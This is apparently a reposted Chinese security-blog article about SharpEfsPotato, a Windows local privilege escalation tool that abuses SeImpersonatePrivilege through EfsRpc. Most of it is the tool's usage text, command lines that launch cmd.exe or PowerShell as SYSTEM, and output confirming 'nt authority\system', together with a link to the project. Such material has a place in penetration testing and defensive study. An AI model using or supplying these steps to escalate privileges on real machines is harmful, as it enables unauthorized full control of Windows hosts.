提权 - SharpEfsPotato

admin
admin
admin
71225
文章
48
评论
2022年10月30日00:31:44评论47 views字数 1829阅读6分5秒阅读模式

提权 - SharpEfsPotato

用法

C:temp>SharpEfsPotato.exe -hSharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
  -p, --prog=VALUE           Program to launch (default cmd.exe)  -a, --args=VALUE           Arguments for program (default null)  -h, --help                 Display this help


默认行为:在单独的进程中作为系统启动 cmd.exe(在单独的控制台中)

C:temp>SharpEfsPotato.exeSharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f44259a4a-cbea-499b-9dc5-a9b1c13a4b9fdf1941c5-fe89-4e79-bf10-463657[email protected]:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!


指定 PowerShell 二进制文件和参数

C:temp>SharpEfsPotato.exe -p C:Windowssystem32WindowsPowerShellv1.0powershell.exe -a "whoami | Set-Content C:tempw.log"SharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/c56e1f1f-f91c-4435-85df-6e158f68acd2c56e1f1f-f91c-4435-85df-6e158f68acd2df1941c5-fe89-4e79-bf10-463657[email protected]:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!
C:temp>type C:tempw.lognt authoritysystem


项目地址

https://github.com/bugch3ck/SharpEfsPotato


原文始发于微信公众号(Khan安全攻防实验室):提权 - SharpEfsPotato

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月30日00:31:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  提权 - SharpEfsPotato http://cn-sec.com/archives/1358179.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: